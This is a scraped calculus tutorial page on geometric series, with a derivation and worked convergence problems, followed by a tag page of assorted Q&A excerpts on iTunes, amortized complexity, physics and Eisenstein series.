{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 1, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.44747912883758545, "perplexity": 1210.6474601680204}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 20, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2020-29/segments/1593657139167.74/warc/CC-MAIN-20200712175843-20200712205843-00200.warc.gz"}
https://17calculus.com/infinite-series/geometric-series/
You CAN Ace Calculus infinite limits infinite series basics related topics For a discussion of geometric sequences, see the page on sequences A main application of a geometric series is to build power series WikiBooks - Geometric Series ### Geometric Series Quick Breakdown used to prove convergence yes used to prove divergence yes can be inconclusive no can find convergence value yes useful for finding power series ### 17Calculus Subjects Listed Alphabetically Single Variable Calculus Absolute Convergence Alternating Series Arc Length Area Under Curves Chain Rule Concavity Conics Conics in Polar Form Conditional Convergence Continuity & Discontinuities Convolution, Laplace Transforms Cosine/Sine Integration Critical Points Cylinder-Shell Method - Volume Integrals Definite Integrals Derivatives Differentials Direct Comparison Test Divergence (nth-Term) Test Ellipses (Rectangular Conics) Epsilon-Delta Limit Definition Exponential Derivatives Exponential Growth/Decay Finite Limits First Derivative First Derivative Test Formal Limit Definition Fourier Series Geometric Series Graphing Higher Order Derivatives Hyperbolas (Rectangular Conics) Hyperbolic Derivatives Implicit Differentiation Improper Integrals Indeterminate Forms Infinite Limits Infinite Series Infinite Series Table Infinite Series Study Techniques Infinite Series, Choosing a Test Infinite Series Exam Preparation Infinite Series Exam A Inflection Points Initial Value Problems, Laplace Transforms Integral Test Integrals Integration by Partial Fractions Integration By Parts Integration By Substitution Intermediate Value Theorem Interval of Convergence Inverse Function Derivatives Inverse Hyperbolic Derivatives Inverse Trig Derivatives Laplace Transforms L'Hôpital's Rule Limit Comparison Test Limits Linear Motion Logarithm Derivatives Logarithmic Differentiation Moments, Center of Mass Mean Value Theorem Normal Lines One-Sided Limits Optimization p-Series Parabolas (Rectangular Conics) Parabolas (Polar Conics) Parametric Equations Parametric Curves Parametric Surfaces Pinching Theorem Polar Coordinates Plane Regions, Describing Power Rule Power Series Product Rule Quotient Rule Radius of Convergence Ratio Test Related Rates Related Rates Areas Related Rates Distances Related Rates Volumes Remainder & Error Bounds Root Test Secant/Tangent Integration Second Derivative Second Derivative Test Shifting Theorems Sine/Cosine Integration Slope and Tangent Lines Square Wave Surface Area Tangent/Secant Integration Taylor/Maclaurin Series Telescoping Series Trig Derivatives Trig Integration Trig Limits Trig Substitution Unit Step Function Unit Impulse Function Volume Integrals Washer-Disc Method - Volume Integrals Work Multi-Variable Calculus Acceleration Vector Arc Length (Vector Functions) Arc Length Function Arc Length Parameter Conservative Vector Fields Cross Product Curl Curvature Cylindrical Coordinates Directional Derivatives Divergence (Vector Fields) Divergence Theorem Dot Product Double Integrals - Area & Volume Double Integrals - Polar Coordinates Double Integrals - Rectangular Gradients Green's Theorem Lagrange Multipliers Line Integrals Partial Derivatives Partial Integrals Path Integrals Potential Functions Principal Unit Normal Vector Spherical Coordinates Stokes' Theorem Surface Integrals Tangent Planes Triple Integrals - Cylindrical Triple Integrals - Rectangular Triple Integrals - Spherical Unit Tangent Vector Unit Vectors Vector Fields Vectors Vector Functions Vector Functions Equations Differential Equations Boundary Value Problems Bernoulli Equation Cauchy-Euler Equation Chebyshev's Equation Chemical Concentration Classify Differential Equations Differential Equations Euler's Method Exact Equations Existence and Uniqueness Exponential Growth/Decay First Order, Linear Fluids, Mixing Fourier Series Inhomogeneous ODE's Integrating Factors, Exact Integrating Factors, Linear Laplace Transforms, Solve Initial Value Problems Linear, First Order Linear, Second Order Linear Systems Partial Differential Equations Polynomial Coefficients Population Dynamics Projectile Motion Reduction of Order Resonance Second Order, Linear Separation of Variables Slope Fields Stability Substitution Undetermined Coefficients Variation of Parameters Vibration Wronskian ### Search Practice Problems Do you have a practice problem number but do not know on which page it is found? If so, enter the number below and click 'page' to go to the page on which it is found or click 'practice' to be taken to the practice problem. 17calculus > infinite series > geometric series Geometric Series How To Use The Geometric Series Finite Geometric Series Additional Geometric Series Topics Practice Geometric Series are an important type of series that you will come across while studying infinite series. This series type is unusual because not only can you easily tell whether a geometric series converges or diverges but, if it converges, you can calculate exactly what it converges to. This is extremely unusual for an infinite series. Let's break down what this theorem is saying and how we can use it. Geometric Series Convergence A series in the form $$\displaystyle{ \sum_{n=0}^{\infty}{r^n}}$$ is called a Geometric Series with ratio $$r$$. $$0 \lt \abs{r} \lt 1$$ $$\abs{r} \geq 1$$ converges diverges Series Convergence Value If the geometric series converges, it converges to $$\displaystyle{\frac{1}{1-r}}$$. This is usually written $$\displaystyle{ \sum_{n=0}^{\infty}{r^n} = \frac{1}{1-r}, ~~ 0 \lt \abs{r} \lt 1 }$$. How To Use The Geometric Series A geometric series looks like this $$\displaystyle{ \sum_{n=0}^{\infty}{ r^n } }$$ where r is an expression of some sort, not containing n. If you can get your series into this form using algebra, then $$r$$ will tell you whether the series converges or diverges. If $$\abs{r} \geq 1$$, then the series diverges. If $$\abs{r} < 1,$$ then the series converges and it converges to $$\displaystyle{\frac{1}{1-r}}$$ Notes 1. r is called the ratio. 2. The absolute values on r to determine convergence or divergence are absolutely critical. Do not drop them unless you are sure that r is positive all the time. If you are not sure, keeping them is always correct. 3. Watch out! - - Be careful to notice that the series given above starts with index $$n=0$$. When determining the convergence value, make sure you take that into account and adjust your series to exactly match this one, including the starting index value of zero. Finite Geometric Series In the following discussion, we are assuming that $$0 < r < 1$$. The equation for the value of a finite geometric series is $$\displaystyle{ \sum_{n=0}^{k}{r^n} = \frac{1-r^{k+1}}{1-r} ~~~~~ (1) }$$ where $$k$$ is a finite positive integer. Show that the above formula holds for $$k=1, k=2$$ and $$k=3$$. Problem Statement Show that the above formula holds for $$k=1, k=2$$ and $$k=3$$. Solution Let $$k=1$$. $$\displaystyle{ \sum_{n=0}^{1}{r^n} = r^0 + r^1 = 1+r }$$ If we substitute $$k=1$$ into the right side of equation $$(1)$$, factor and simplify, we get $$\displaystyle{ \frac{1-r^{1+1}}{1-r} = \frac{1-r^2}{1-r} = \frac{(1+r)(1-r)}{1-r} = 1+r }$$ So we have shown that the equation holds for $$k=1$$. Let's try $$k=2$$. Let $$k=2$$ and go through the same steps. $$\displaystyle{ \sum_{n=0}^{2}{r^n} = r^0 + r^1 + r^2 = 1+r+r^2 }$$ If we substitute $$k=2$$ into the right side of equation $$(1)$$, factor and simplify, we get $$\displaystyle{ \frac{1-r^{1+2}}{1-r} = \frac{1-r^3}{1-r} = \frac{(1+r+r^2)(1-r)}{1-r} = 1+r+r^2 }$$ It works again. How about for $$k=3$$? Let $$k=3$$. $$\displaystyle{ \sum_{n=0}^{3}{r^n} = r^0 + r^1 + r^2 + r^3 = 1+r+r^2+r^3 }$$ This time, if we set up the right side of equation $$(1)$$, the factoring is getting a little bit more complicated. So let's work backwards and start with $$1+r+r^2+r^3$$ and try to get the right side of equation $$(1)$$. To do this we multiple by $$(1-r)/(1-r)$$. $$1+r+r^2+r^3$$ $$\displaystyle{ \displaystyle{(1+r+r^2+r^3)\frac{1-r}{1-r}} }$$ $$\displaystyle{ \displaystyle{\frac{(1+r+r^2+r^3)-r(1+r+r^2+r^3)}{1-r}} }$$ $$\displaystyle{ \displaystyle{\frac{1+r+r^2+r^3 -r - r^2 - r^3 - r^4}{1-r}} }$$ $$\displaystyle{ \displaystyle{\frac{1-r^4}{1-r}} }$$ Notice that all the inside terms cancel and we are left with $$1-r^4$$ in the numerator. Derivation In this section, we will derive equation (1). Let $$\displaystyle{ S_n = \sum_{k=0}^{n}{r^k} = }$$ $$1+r+r^2+r^3+ . . . + r^n$$ Multiplying this by $$r$$ gives us $$rS_n = r + r^2 + r^3 + . . . +r^n + r^{n+1}$$ Now we subtract $$rS_n$$ from $$S_n$$ to get $$S_n - rS_n = (1+ r + r^2 + r^3 + . . . +r^n)$$ $$-$$ $$(r+r^2+r^3+ . . . + r^n + r^{n+1} )$$ Looking closely at the terms on the right side of the equal sign, we can see that all the terms cancel except for $$1-r^{n+1}$$. So now we have $$S_n-rS_n = 1-r^{n+1}$$. Now we solve for $$S_n$$. $$\begin{array}{rcl} S_n-rS_n & = & 1-r^{n+1} \\ S_n(1-r) & = & 1-r^{n+1} \\ S_n & = & \displaystyle{ \frac{1-r^{n+1}}{1-r} } \end{array}$$ $$\displaystyle{ \sum_{k=0}^{n}{r^k} = \frac{1-r^{k+1}}{1-r} }$$ [qed] This video shows a geometric series applied to a financial equation. The application of calculus to finances is not covered on this site. But you may find this video helpful if you are in business calculus. ### Krista King Math - Financial Application of Geometric Series [9min-49secs] video by Krista King Math ### Practice Conversion Between A-B-C Level (or 1-2-3) and New Numbered Practice Problems Please note that with this new version of 17calculus, the practice problems have been relabeled but they are MOSTLY in the same order. So, Practice A01 (1) is probably the first basic practice problem, A02 (2) is probably the second basic practice problem, etc. Practice B01 is probably the first intermediate practice problem and so on. GOT IT. THANKS! Instructions - - Unless otherwise instructed, for each of the following series 1. determine whether it converges or diverges, using the geometric series test, if possible. 2. If it converges, determine what it converges to (if possible). Give your answers in exact form. Basic Problems $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ Problem Statement $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ The series $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ converges to 4 by the Geometric Series Test. Problem Statement $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ Solution There is a geometric series hidden here. First key: If there is a constant in a series, pull it outside the sum. This will often simplify the problem so that you can see it more clearly. After you do that, you get $$\displaystyle{ a_n = \frac{1}{4^n} }$$ Now, since there is a one in numerator, you can rewrite this as: $$\displaystyle{ a_n = \frac{1^n}{4^n} = \left( \frac{1}{4} \right)^n }$$ You can now see that you have $$\left|r\right|=1/4 < 1$$, which converges by the geometric series test. Additionally, we can determine that it converges to $$\displaystyle{ \frac{3}{1-(1/4)} = \frac{3}{3/4} = 4 }$$ The series $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{3}{4^n} } }$$ converges to 4 by the Geometric Series Test. $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ The series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ converges to $$\displaystyle{\frac{2}{e-2}}$$ by the Geometric Series Test. Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ Solution Convergence Or Divergence Since we have the same power in the numerator and denominator, we can combine them to get $$\displaystyle{ \frac{2^n}{e^n} = \left( \frac{2}{e} \right)^n }$$ Now we can see that we have a geometric series with $$\left|r\right|=2/e < 1$$ so the series converges. Convergence Value When determining only convergence or divergence, you don't need to worry about the starting n-value. But you do need to consider it if you are trying to determine what a series converges to. Notice in the definition of a geometric series, n starts at zero. In this series, n starts at one. So we need to take that into account when determining what it converges to. This means, for this problem, we need to subtract 1 (because when $$n=0$$, the term is 1; this is not always the case, so you need to determine this in each problem). $$\displaystyle{ \frac{1}{1-(2/e)} - 1 = \frac{e}{e-2} - \frac{e-2}{e-2} = \frac{2}{e-2} }$$ The series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^n}{e^n} } }$$ converges to $$\displaystyle{\frac{2}{e-2}}$$ by the Geometric Series Test. $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{1+\sqrt{5}}{2} \right]^n } }$$ Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{1+\sqrt{5}}{2} \right]^n } }$$ The geometric series diverges. Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{1+\sqrt{5}}{2} \right]^n } }$$ Solution ### 274 solution video video by MIT OCW The geometric series diverges. $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ diverges. Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ Solution ### 277 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{\pi^n }{ 3^{n+2}} } }$$ diverges. $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ converges. Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ Solution ### 278 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{ 3^n+2^n }{ 6^n } } }$$ converges. $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ Problem Statement $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ The geometric series $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ converges to $$5/4$$. Problem Statement $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ Solution ### 280 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=0}^{\infty}{ \frac{ 1 }{ 5^n } } }$$ converges to $$5/4$$. $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ converges. Problem Statement $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ Solution ### 282 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=1}^{\infty}{ \left[ \frac{3^n}{4^n} + \frac{2}{7^n} \right] } }$$ converges. $$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ Problem Statement $$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ The geometric series $$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ converges to $$3$$. Problem Statement $$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ Solution ### 285 solution video video by Krista King Math The geometric series $$\displaystyle{ \sum_{k=0}^{\infty}{ \left( \frac{2}{3} \right)^k } }$$ converges to $$3$$. Express $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + . . . }$$ using sigma notation. Problem Statement Express $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + . . . }$$ using sigma notation. $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + . . . = \sum_{n=1}^{\infty}{ \left[ \frac{(-1)^{n+1} (2)^n}{(13)^n} \right] } }$$ Problem Statement Express $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + . . . }$$ using sigma notation. Solution In this video, his answer is incorrect. He writes $$(-2)^n$$ but the signs do not match the ones given in the problem statement. We could have written this as $$-(-2)^n$$ but we chose the more standard $$(-1)^{n+1} (2)^n$$. ### 281 solution video video by PatrickJMT $$\displaystyle{ 2/13 - 4/13^2 + 8/13^3 - 16/13^4 + . . . = \sum_{n=1}^{\infty}{ \left[ \frac{(-1)^{n+1} (2)^n}{(13)^n} \right] } }$$ Express $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ . . . }$$ using sigma notation. Problem Statement Express $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ . . . }$$ using sigma notation. $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ . . . = \sum_{n=0}^{\infty}{ \frac{1}{10^n} } }$$ Problem Statement Express $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ . . . }$$ using sigma notation. Solution ### 279 solution video video by PatrickJMT $$\displaystyle{ 1+0.1+0.01+0.001+0.0001+ . . . = \sum_{n=0}^{\infty}{ \frac{1}{10^n} } }$$ Express $$\displaystyle{ 1+0.4+0.16+0.064+ . . . }$$ using sigma notation and determine convergence or divergence. Problem Statement Express $$\displaystyle{ 1+0.4+0.16+0.064+ . . . }$$ using sigma notation and determine convergence or divergence. The geometric series $$\displaystyle{ 1+0.4+0.16+0.064+ . . . }$$ converges to $$5/3$$. Problem Statement Express $$\displaystyle{ 1+0.4+0.16+0.064+ . . . }$$ using sigma notation and determine convergence or divergence. Solution ### 275 solution video video by PatrickJMT The geometric series $$\displaystyle{ 1+0.4+0.16+0.064+ . . . }$$ converges to $$5/3$$. $$\displaystyle{ 1 + e^{-1} + e^{-2} + e^{-3} + . . . }$$ Problem Statement $$\displaystyle{ 1 + e^{-1} + e^{-2} + e^{-3} + . . . }$$ The geometric series $$\displaystyle{1 + e^{-1} + e^{-2} + e^{-3} + . . . }$$ converges to $$\displaystyle{\frac{e}{e-1}}$$. Problem Statement $$\displaystyle{ 1 + e^{-1} + e^{-2} + e^{-3} + . . . }$$ Solution ### 286 solution video video by Krista King Math The geometric series $$\displaystyle{1 + e^{-1} + e^{-2} + e^{-3} + . . . }$$ converges to $$\displaystyle{\frac{e}{e-1}}$$. $$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + . . . }$$ Problem Statement $$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + . . . }$$ The geometric series $$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + . . . }$$ converges to $$1$$. Problem Statement $$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + . . . }$$ Solution ### 287 solution video video by Krista King Math The geometric series $$\displaystyle{ \frac{3}{2} - \frac{3}{4} + \frac{3}{8} - \frac{3}{16} + . . . }$$ converges to $$1$$. $$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ Problem Statement $$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ The geometric series $$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ converges to $$\displaystyle{ \frac{5}{6} }$$. Problem Statement $$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ Solution ### 288 solution video video by Krista King Math The geometric series $$\displaystyle{ 1 - \frac{1}{5} + \left( \frac{1}{5} \right)^2 - \left( \frac{1}{5} \right)^3 + \ldots }$$ converges to $$\displaystyle{ \frac{5}{6} }$$. Intermediate Problems $$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ Problem Statement $$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ The geometric series $$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ converges absolutely to $$-1/5$$. Problem Statement $$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ Solution Converges Or Diverges? With this series, you may have immediately recognized that it is an alternating series. Using the Alternating Series Test does tell you correctly that this series converges. However, if you look more closely, you might see there is a geometric series hidden here. Let's do some algebra to make it more obvious. What we want to do is pull out all constants (not dependent on n), then try to get all the exponents to be the same, so that we can combine them. The tricky term is the $$2^{n-1}$$. This can be written as $$\displaystyle{ 2^{n-1} = (2^n)(2^{-1}) = \frac{2^n}{2}}$$. So, now we can move things around so that we can easily see the geometric series. $$\displaystyle{ \frac{(-1)^n2^{n-1}}{3^n} = \frac{(-1)^n2^n}{3^n \cdot 2} = \frac{1}{2} \left( \frac{-2}{3} \right)^n }$$ First, we pulled out any constants (not dependent on n). Then we combined all the terms with the same power. Can you now see that we have a geometric series where $$a=1/2$$ and $$r=-2/3$$? In this case $$\left|r\right|=2/3<1$$, so the series converges. Convergence Value We can also determine what it converges to, but we need to be careful here. Notice in the Geometric Series theorem, the index n starts with zero. But our series starts with one. We need to take that into account here. In our case, when $$n=0$$, we have $$1/2$$. So we need to subtract $$1/2$$ from the formula to get $$\displaystyle{\frac{1/2}{1-(-2/3)} - \frac{1}{2} = \frac{3/2}{3+2} - \frac{1}{2} = \frac{3}{10} - \frac{5}{10} = \frac{-2}{10} = \frac{-1}{5} }$$ Absolute Or Conditional Convergence Now we need to determine whether the series converges absolutely or conditionally. To do that we need to determine whether the series $$\displaystyle{ \sum_{n=1}^{\infty}{ \frac{2^{n-1}}{3^n} } }$$ converges. Using similar algebra as we did above, this series reduces to a geometric series with $$r = 2/3$$. Since $$\left|r=2/3\right| < 1$$, this series converges. Therefore, the original series converges absolutely. The geometric series $$\displaystyle{\sum_{n=1}^{\infty}{\frac{(-1)^n2^{n-1}}{3^n}}}$$ converges absolutely to $$-1/5$$. $$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ Problem Statement $$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ The geometric series $$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ converges to $$20/3$$. Problem Statement $$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ Solution ### 276 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=3}^{\infty}{ 5 (2/3)^{n-1} } }$$ converges to $$20/3$$. $$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ Problem Statement $$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ The geometric series $$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ converges to $$\displaystyle{ \frac{ \pi^4 }{ 36(6-\pi) } }$$. Problem Statement $$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ Solution ### 283 solution video video by PatrickJMT The geometric series $$\displaystyle{ \sum_{n=3}^{\infty}{ \frac{ \pi^{n+1} }{ 6^n } } }$$ converges to $$\displaystyle{ \frac{ \pi^4 }{ 36(6-\pi) } }$$. Express $$\displaystyle{ 0.\overline{21} }$$ as a fraction. Problem Statement Express $$\displaystyle{ 0.\overline{21} }$$ as a fraction. The decimal $$\displaystyle{ 0.2121 \overline{21} }$$ can be written as a geometric series $$\displaystyle{ \sum_{k=0}^{\infty}{ \frac{21}{100} \left[ \frac{1}{100} \right]^k } }$$ which converges to $$7/33$$. Problem Statement Express $$\displaystyle{ 0.\overline{21} }$$ as a fraction. Solution ### 284 solution video video by Krista King Math The decimal $$\displaystyle{ 0.2121 \overline{21} }$$ can be written as a geometric series $$\displaystyle{ \sum_{k=0}^{\infty}{ \frac{21}{100} \left[ \frac{1}{100} \right]^k } }$$ which converges to $$7/33$$.
2018-01-23 13:32:30
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 0, "mathjax_display_tex": 1, "mathjax_asciimath": 0, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.9653778076171875, "perplexity": 797.3500259722459}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2018-05/segments/1516084891976.74/warc/CC-MAIN-20180123131643-20180123151643-00657.warc.gz"}
https://proxieslive.com/tag/constant/
## constant popup: “iTunes has found purchased items on the iPhone “xyz” that are not present in your iTunes library” I keep getting the below popup every single time (or almost every single time) I connect my iPhone to my MacBook Pro with a lightning cable. Every time I click “Transfer,” but it always comes up again. I could click “Do not ask me again,” but I do actually want purchased items transferred… I just don’t think it’s doing that. Any way I can fix this? I’m not making very many purchases on my iPhone so I know it’s not being caused by actual new purchases each time. Also I’ve tried this with multiple cables so I don’t think it’s a faulty cable issue. In case it’s relevant I have iTunes Match and do not have Apple Music. Other details: iPhone 6S, MacOS Mojave, iTunes 12.9.4.94, it’s over a USB 3 to Lightning cable. ## Constant factor of an array In Elements of Programming Interviews in Python by Aziz, Lee and Prakash, they state on page 41: Insertion into a full array can be handled by resizing, i.e., allocating a new array with additional memory and copying over the entries from the original array. This increases the worst-case time of insertion, but if the new array has, for example, a constant factor larger than the original array, the average time for insertion is constant since resizing is infrequent. I grasp the concept of amortization that seems to be implied here, yet they seem to imply that in other cases, a newly allocated array could possess a constant factor smaller than the original array. Is that so? What does “constant factor” mean in this particular context? I’m having trouble understanding what’s being said here. ## Calculate initial velocity based on displacement, time and constant acceleration. “A car has a constant speed along a road. It goes down a hill at a constant acceleration. 50s after it goes down the hill the speed is doubled and 50s later it reaches the end of the 200m hill and is back at a constant speed. Find out the initial velocity and acceleration.” At first I made relevant graphs to see if I could find some useful information from that but no luck. Then I tried to use the “suvat” equations but we haven’t learned them in class so I’m not allowed to use them, which is why I’m stuck as to how to solve this basic problem. ## Complexity of many constant time steps with occasional logarithmic steps I have a data structure that can perform a task $$T$$ in constant time, $$O(1)$$. However, every $$k$$th invocation requires $$O(\log{n})$$. Is it possible for this task to ever take amortized constant time, or is it impossible because the logarithm will eventually become greater than $$k$$? If an upper bound for $$n$$ is known as $$N$$, can $$k$$ be chosen to be less than $$\log{N}$$? ## What is the meaning of the “constant term of Eisenstein series” in terms of Fourier analysis Let $$G$$ be a connected, reductive group over $$\mathbb Q$$, with parabolic subgroup $$P = MN$$. Let $$\pi$$ be a cuspidal automorphic representation of $$M(\mathbb A)$$. For a smooth, right $$K$$-finite function $$\phi$$ in the induced space $$\operatorname{Ind}_{P(\mathbb A)}^{G(\mathbb A)} \pi$$ (realized in a suitable way as a function $$\phi: G(\mathbb Q) \backslash G(\mathbb A )\rightarrow \mathbb C$$), we can associate the Eisenstein series $$E(g,\phi) = \sum\limits_{\delta \in P(\mathbb Q) \backslash G(\mathbb Q)} \phi(\delta g)$$ Assuming $$\pi$$ is chosen so that this series converges absolutely, one can define the constant term of the Eisenstein series along a parabolic subgroup $$P’$$ with unipotent radical $$N’$$: $$E_{P’}(g,\phi) = \int\limits_{N'(\mathbb Q) \backslash N'(\mathbb A)}E(n’g,\phi)dn’ \tag{0}$$ I see the constant term defined in this way without reference to Fourier analysis. Is it possible to always realize this object as the constant term of an honest Fourier expansion on some product of copies of $$\mathbb A/\mathbb Q$$? This can be done when $$G = \operatorname{GL}_2$$ and $$P = P’$$ the usual Borel. The unipotent radical identifies with the additive group $$\mathbb G_a$$, and for fixed $$g \in G(\mathbb A)$$ the function $$\mathbb A/\mathbb Q \rightarrow \mathbb C, n \mapsto \phi(ng)$$ has an absolutely convergent Fourier expansion $$E(ng,\phi) = \sum\limits_{\alpha \in \mathbb Q} \int\limits_{\mathbb A/\mathbb Q} E(n’ng,\phi) \psi(-\alpha n’)dn’ \tag{1}$$ where $$\psi$$ is a fixed nontrivial additive character of $$\mathbb A/\mathbb Q$$. The constant term is $$\int\limits_{\mathbb A/\mathbb Q} E(n’ng,\phi) dn’$$ Setting $$n = 1$$ in (1) gives us a series expansion for $$E(g,\phi)$$ and (0) is the constant term of this series. ## Level sets of function with constant sign partial derivatives Consider a smooth function $$f: E \to \mathbb{R}$$ in the closed subset $$E \subset \mathbb{R}^N$$ with boundary $$\partial E$$. Show that if the partial derivatives $$\partial f/\partial x_j$$ do not change sign in $$E$$ then there every level set of $$f$$ in $$E$$ is connected. My attempt: I know that since the partial derivatives don’t change sign, then there is no critical point of $$f$$ in $$E$$, so there is no closed level set in $$E$$. Therefore, every level set has boundary on $$\partial E$$. I am not sure how to prove that, for a given level set, there cannot be two or more connected components. Any help would be greatly appreciated! Thanks! ## How to 